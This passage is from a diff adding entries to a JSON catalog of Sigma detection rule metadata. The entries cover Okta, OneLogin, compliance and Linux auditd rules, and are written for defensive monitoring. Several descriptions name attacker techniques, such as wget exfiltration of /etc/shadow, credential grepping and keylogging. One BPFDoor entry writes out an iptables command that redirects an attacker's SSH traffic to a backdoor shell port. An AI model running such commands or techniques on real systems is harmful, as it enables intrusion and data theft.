"medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an security threat is detected in Okta.", + "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", + "value": "Okta Security Threat Detected", + "meta": { + "refs": [ + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" + ], + "tags": "No established tags", + "creation_date": "2021/09/12", + "filename": "okta_security_threat_detected.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when unauthorized access to app occurs.", + "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", + "value": "Okta Unauthorized Access to App", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_unauthorized_access_to_app.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "User might of believe that they had access." + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an user account is locked out.", + "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", + "value": "Okta User Account Locked Out", + "meta": { + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/12", + "filename": "okta_user_account_locked_out.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "okta" + } + }, + { + "description": "Detects when an user assumed another user account.", + "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", + "value": "OneLogin User Assumed Another User", + "meta": { + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/10/12", + "filename": "onelogin_assumed_another_user.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "onelogin" + } + }, + { + "description": "Detects when an user account is locked or suspended.", + "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", + "value": "OneLogin User Account Locked", + "meta": { + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/10/12", + "filename": "onelogin_user_account_locked.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "System may lock or suspend user accounts." + ], + "logsource.category": "No established category", + "logsource.product": "onelogin" + } + }, + { + "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\n", + "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", + "value": "Default Credentials Usage", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "default_credentials_usage.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "qualys" + } + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\n", + "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", + "value": "Cleartext Protocol Usage", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "firewall_cleartext_protocols.yml", + "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a \u2018Member is added to a Security Group\u2019.\nEvent ID 4729 indicates a \u2018Member is removed from a Security enabled-group\u2019 .\nEvent ID 4730 indicates a \u2018Security Group is deleted\u2019.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "value": "Group Modification Logging", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/group_modification_logging.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "group_modification_logging.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", + "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", + "value": "Host Without Firewall", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/19", + "filename": "host_without_firewall.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "qualys" + } + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", + "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", + "value": "Cleartext Protocol Usage Via Netflow", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "netflow_cleartext_protocols.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "No established product" + } + }, + { + "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", + "uuid": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", + "value": "Locked Workstation", + "meta": { + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/workstation_was_locked.yml" + ], + "tags": "No established tags", + "creation_date": "2019/03/26", + "filename": "workstation_was_locked.yml", + "author": "Alexandr Yampolskyi, SOC Prime", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "uuid": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "value": "Edit of .bash_profile and .bashrc", + "meta": { + "refs": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml" + ], + "tags": [ + "attack.s0003", + "attack.persistence", + "attack.t1546.004" + ], + "creation_date": "2019/05/12", + "filename": "lnx_auditd_alter_bash_profile.yml", + "author": "Peter Matkovski", + "level": "medium", + "falsepositive": [ + "Admin or User activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to record audio with arecord utility", + "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "value": "Audio Capture", + "meta": { + "refs": [ + "https://linux.die.net/man/1/arecord", + "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://attack.mitre.org/techniques/T1123/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ], + "creation_date": "2021/09/04", + "filename": "lnx_auditd_audio_capture.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect changes in auditd configuration files", + "uuid": "977ef627-4539-4875-adf4-ed8f780c4922", + "value": "Auditing Configuration Changes on Linux Host", + "meta": { + "refs": [ + "https://github.com/Neo23x0/auditd/blob/master/audit.rules", + "Self Experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_auditing_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ], + "creation_date": "2019/10/25", + "filename": "lnx_auditd_auditing_config_change.yml", + "author": "Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", + "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", + "value": "Binary Padding - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ], + "creation_date": "2020/10/13", + "filename": "lnx_auditd_binary_padding.yml", + "author": "Igor Fits, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate script work" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", + "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", + "value": "BPFDoor Abnormal Process ID or Lock File Accessed", + "meta": { + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.t1059" + ], + "creation_date": "2022/08/10", + "filename": "lnx_auditd_bpfdoor_file_accessed.yml", + "author": "Rafal Piasecki", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'\nThe traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only.\n", + "uuid": "70b4156e-50fc-4523-aa50-c9dddf1993fc", + "value": "Bpfdoor TCP Ports Redirect", + "meta": { + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ], + "creation_date": "2022/08/10", + "filename": "lnx_auditd_bpfdoor_port_redirect.yml", + "author": "Rafal Piasecki", + "level": "medium", + "falsepositive": [ + "Legitimate ports redirect" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", + "uuid": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", + "value": "Linux Capabilities Discovery", + "meta": { + "refs": [ + "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", + "https://mn3m.info/posts/suid-vs-capabilities/", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" + ], + "tags": [ + "attack.collection", + "attack.privilege_escalation", + "attack.t1123", + "attack.t1548" + ], + "creation_date": "2021/11/28", + "filename": "lnx_auditd_capabilities_discovery.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files.", + "uuid": "b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b", + "value": "File Time Attribute Change - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_change_file_time_attr.yml", + "author": "Igor Fits, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects removing immutable file attribute.", + "uuid": "a5b977d6-8a81-4475-91b9-49dbfcd941f7", + "value": "Remove Immutable File Attribute - Auditd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2019/09/23", + "filename": "lnx_auditd_chattr_immutable_removal.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "medium", + "falsepositive": [ + "Administrator interacting with immutable files (e.g. for instance backups)." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "value": "Clipboard Collection with Xclip Tool - Auditd", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/09/24", + "filename": "lnx_auditd_clipboard_collection.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "uuid": "f200dc3f-b219-425d-a17e-c38467364816", + "value": "Clipboard Collection of Image Data with Xclip Tool", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1115/", + "https://linux.die.net/man/1/xclip", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2021/10/01", + "filename": "lnx_auditd_clipboard_image_collection.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects command line parameter very often used with coin miners", + "uuid": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", + "value": "Possible Coin Miner CPU Priority Param", + "meta": { + "refs": [ + "https://xmrig.com/docs/miner/command-line-options", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_coinminer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2021/10/09", + "filename": "lnx_auditd_coinminer.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Other tools that use a --cpu-priority flag" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "uuid": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", + "value": "Creation Of An User Account", + "meta": { + "refs": [ + "MITRE Attack technique T1136; Create Account ", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ], + "creation_date": "2020/05/18", + "filename": "lnx_auditd_create_account.yml", + "author": "Marie Euler", + "level": "medium", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing\nrequired to trigger the heap-based buffer overflow.\n", + "uuid": "5ee37487-4eb8-4ac2-9be1-d7d14cdc559f", + "value": "CVE-2021-3156 Exploitation Attempt", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ], + "creation_date": "2021/02/01", + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-3156.\nAlternative approach might be to look for flooding of auditd logs due to bruteforcing.\nrequired to trigger the heap-based buffer overflow.\n", + "uuid": "b9748c98-9ea7-4fdb-80b6-29bed6ba71d2", + "value": "CVE-2021-3156 Exploitation Attempt Bruteforcing", + "meta": { + "refs": [ + "https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "cve.2021.3156" + ], + "creation_date": "2021/02/01", + "filename": "lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation attempt of vulnerability described in CVE-2021-4034.", + "uuid": "40a016ab-4f48-4eee-adde-bbf612695c53", + "value": "CVE-2021-4034 Exploitation Attempt", + "meta": { + "refs": [ + "https://github.com/berdav/CVE-2021-4034", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034", + "https://access.redhat.com/security/cve/CVE-2021-4034", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2022/01/27", + "filename": "lnx_auditd_cve_2021_4034.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "uuid": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "value": "Data Compressed", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_compressed.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1560.001" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_data_compressed.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate use of archiving tools by legitimate user." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects attempts to post the file with the usage of wget utility.\nThe adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow.\n", + "uuid": "cb39d16b-b3b6-4a7a-8222-1cf24b686ffc", + "value": "Data Exfiltration with Wget", + "meta": { + "refs": [ + "https://attack.mitre.org/tactics/TA0010/", + "https://linux.die.net/man/1/wget", + "https://gtfobins.github.io/gtfobins/wget/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2021/11/18", + "filename": "lnx_auditd_data_exfil_wget.yml", + "author": "Pawel Mazur", + "level": "medium", + "falsepositive": [ + "Legitimate usage of wget utility to post a file" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects overwriting (effectively wiping/deleting) of a file.", + "uuid": "37222991-11e9-4b6d-8bdf-60fbe48f753e", + "value": "Overwriting the File with Dev Zero or Null", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_dd_delete_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ], + "creation_date": "2019/10/23", + "filename": "lnx_auditd_dd_delete_file.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "low", + "falsepositive": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", + "value": "Disable System Firewall", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://attack.mitre.org/techniques/T1562/004/", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" + ], + "tags": [ + "attack.t1562.004", + "attack.defense_evasion" + ], + "creation_date": "2022/01/22", + "filename": "lnx_auditd_disable_system_firewall.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects file and folder permission changes.", + "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "value": "File or Folder Permissions Change", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2019/09/23", + "filename": "lnx_auditd_file_or_folder_permissions.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "low", + "falsepositive": [ + "User interacting with files permissions (normal/daily behaviour)." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detecting attempts to extract passwords with grep", + "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", + "value": "Credentials In Files - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_find_cred_in_files.yml", + "author": "Igor Fits, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", + "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "value": "Hidden Files and Directories", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://attack.mitre.org/techniques/T1564/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2021/09/06", + "filename": "lnx_auditd_hidden_files_directories.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects appending of zip file to image", + "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", + "value": "Steganography Hide Zip Information in Picture File", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/09", + "filename": "lnx_auditd_hidden_zip_files_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect attempt to enable auditing of TTY input", + "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", + "value": "Linux Keylogging with Pam.d", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://attack.mitre.org/techniques/T1003/", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ], + "creation_date": "2021/05/24", + "filename": "lnx_auditd_keylogging_with_pam_d.yml", + 